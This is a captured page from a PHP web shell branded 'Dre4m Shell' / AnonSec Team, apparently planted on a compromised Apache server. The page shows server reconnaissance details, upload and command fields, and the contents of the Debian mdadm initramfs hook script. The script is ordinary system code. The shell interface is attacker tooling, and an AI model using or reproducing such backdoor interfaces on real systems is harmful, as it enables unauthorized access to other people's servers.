Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.188.211.44
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/initramfs-tools/hooks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/initramfs-tools/hooks/mdadm
#!/bin/sh
#
# Copyright © 2006-2008 Martin F. Krafft <madduck@debian.org>,
#             2012 Michael Tokarev <mjt@tls.msk.ru>
# based on the scripts in the initramfs-tools package.
# released under the terms of the Artistic Licence.
#
set -eu

PREREQ="udev"

prereqs()
{
	echo "$PREREQ"
}

case "${1:-}" in
  prereqs)
    prereqs
    exit 0
    ;;
esac

is_true()
{
  case "${1:-}" in
    [Yy]es|[Yy]|1|[Tt]rue|[Tt]) return 0;;
    *) return 1;;
  esac
}

write()
{
	local PREFIX; PREFIX=$1; shift
	echo "${PREFIX}: mdadm: $@" >&2
}


info()
{
	is_true ${VERBOSE:-false} && write I "$@" || :
}


warn()
{
	write W "$@"
}

. /usr/share/initramfs-tools/hook-functions

# copy the binary as early as possible
copy_exec /sbin/mdadm /sbin
copy_exec /sbin/mdmon /sbin

# Copy udev rules, which udev no longer does
for UDEV_RULE in 63-md-raid-arrays.rules 64-md-raid-assembly.rules; do
for rules_folder in /lib/udev/rules.d /etc/udev/rules.d; do
    if [ -f $rules_folder/$UDEV_RULE ]; then
	mkdir -p $DESTDIR$rules_folder
	cp $rules_folder/$UDEV_RULE $DESTDIR$rules_folder/$UDEV_RULE
    fi
done
done

# copy the mdadm configuration
CONFIG=/etc/mdadm/mdadm.conf
ALTCONFIG=/etc/mdadm.conf
DESTMDADMCONF=$DESTDIR/etc/mdadm/mdadm.conf
[ ! -f $CONFIG ] && [ -f $ALTCONFIG ] && CONFIG=$ALTCONFIG || :
mkdir -p ${DESTDIR}/etc/mdadm

if [ ! -f $CONFIG ]; then
        # there is no configuration file, so let's create one
        if /usr/share/mdadm/mkconf generate $CONFIG; then
                # all is well
                cp -p $CONFIG $DESTMDADMCONF
                info "auto-generated the mdadm.conf configuration file."
        else
                # we failed to auto-generate, so let the emergency procedure take over
                warn "failed to auto-generate the mdadm.conf file."
                warn "please read /usr/share/doc/mdadm/README.upgrading-2.5.3.gz ."
        fi
else
	cp -p $CONFIG ${DESTDIR}/etc/mdadm
	sed -i '/^CREATE/s/^/#/' $DESTMDADMCONF
        if ! grep -q '^ARRAY' $CONFIG; then
                tmpfile="${DESTMDADMCONF}.tmp"
                warn "$CONFIG defines no arrays."
                if /usr/share/mdadm/mkconf > $tmpfile; then
                        cp -p $tmpfile $DESTMDADMCONF
                else
                        warn "failed to auto-generate temporary mdadm.conf file."
                fi
        else
                # make sure the configuration file knows about all running devices
                /sbin/mdadm --detail --scan | while read array device params; do
                        uuid=${params#*UUID=}; uuid=${uuid%% *}
                        if ! grep -qi "UUID=$uuid" $DESTMDADMCONF; then
                                warn "the array $device with UUID $uuid"
                                warn "is currently active, but it is not listed in mdadm.conf. if"
                                warn "it is needed for boot, then YOUR SYSTEM IS NOW UNBOOTABLE!"
                                warn "please inspect the output of /usr/share/mdadm/mkconf, compare"
                                warn "it to $CONFIG, and make the necessary changes."
                        fi
                done
        fi
fi

# load raid modules in the initramfs
for module in linear multipath raid0 raid1 raid456 raid5 raid6 raid10; do
	force_load $module
done


Anon7 - 2022
AnonSec Team